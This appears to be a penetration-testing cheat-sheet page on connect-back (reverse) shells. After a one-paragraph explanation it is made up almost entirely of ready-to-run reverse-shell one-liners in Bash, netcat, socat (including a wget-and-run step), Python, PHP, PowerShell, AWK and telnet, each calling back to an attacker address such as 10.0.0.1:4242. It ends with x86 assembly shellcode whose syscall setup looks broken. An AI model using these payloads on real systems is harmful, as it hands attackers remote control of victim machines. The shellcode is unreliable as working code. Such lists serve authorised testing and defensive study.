Skip to content

Connect-Back (Reverse Shell)

Connect back or Call back shell code creates a new socket on the target system and then connects to the attacking IP to establish a new connection. Assuming an exploit can reach the target through the firewall, this type of shell code is beneficial because the trusted network usually has a liberal policy.

Examples

Bash TCP

1
2
3
4
5
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Bash UDP

1
2
3
4
5
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:
nc -u -lvp 4242

Netcat Traditional

1
2
3
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242

socat

1
2
3
4
5
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242

user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

Python IPv4

1
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Python IPv6

1
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

PHP

1
2
3
4
5
6
7
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Powershell

1
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

AWK

1
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

telnet

1
2
3
4
5
6
In Attacker machine start two listeners:
nc -lvp 8080
nc -lvp 8081

In Victime machine run below command:
telnet <Your_IP> 8080 | /bin/sh | telnet <Your_IP> 8081

assembly

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
section .text
    global _start

_start:
    ; Create socket
    xor eax, eax            ; Clear eax register
    push eax                ; Push 0 (IPPROTO_IP) onto the stack
    push byte 1             ; Push 1 (SOCK_STREAM) onto the stack
    push byte 2             ; Push 2 (AF_INET) onto the stack
    mov ecx, esp            ; Save pointer to sockaddr structure in ecx
    mov al, 102             ; syscall number for socket syscall
    int 0x80                ; Call kernel

    ; Connect to attacker's IP and port
    mov ebx, eax            ; Save socket file descriptor
    xor eax, eax            ; Clear eax register
    push eax                ; Push 0 (htonl(INADDR_ANY)) onto the stack
    push word 0x5c11        ; Push port number (e.g., 4444) in network byte order onto the stack
    push dword 0x7f000001   ; Push IP address (e.g., 127.0.0.1) onto the stack
    mov ecx, esp            ; Save pointer to sockaddr_in structure in ecx
    mov al, 101             ; syscall number for connect syscall
    int 0x80                ; Call kernel

    ; Duplicate file descriptors for stdin, stdout, stderr
    xor ebx, ebx            ; Clear ebx register
    push ebx                ; Push 0 onto the stack (NULL pointer)
    mov edx, esp            ; Save pointer to NULL pointer in edx
    mov al, 63              ; syscall number for dup2 syscall
    mov ecx, ebx            ; Clear ecx register
    mov bl, 2               ; Loop 3 times (for file descriptors 0, 1, 2)
dup_loop:
    inc ecx                 ; Increment ecx to get next file descriptor
    int 0x80                ; Call kernel
    dec bl                  ; Decrement loop counter
    jnz dup_loop            ; Loop until all file descriptors are duplicated

    ; Execute /bin/sh
    xor eax, eax            ; Clear eax register
    push eax                ; Push 0 onto the stack (NULL terminator)
    push 0x68732f2f         ; Push "//sh" onto the stack
    push 0x6e69622f         ; Push "/bin" onto the stack
    mov ebx, esp            ; Save pointer to "/bin//sh" string in ebx
    push eax                ; Push 0 onto the stack (NULL terminator)
    mov edx, esp            ; Save pointer to NULL pointer in edx
    push ebx                ; Push pointer to "/bin//sh" string onto the stack
    mov ecx, esp            ; Save pointer to argument array in ecx
    mov al, 11              ; syscall number for execve syscall
    int 0x80                ; Call kernel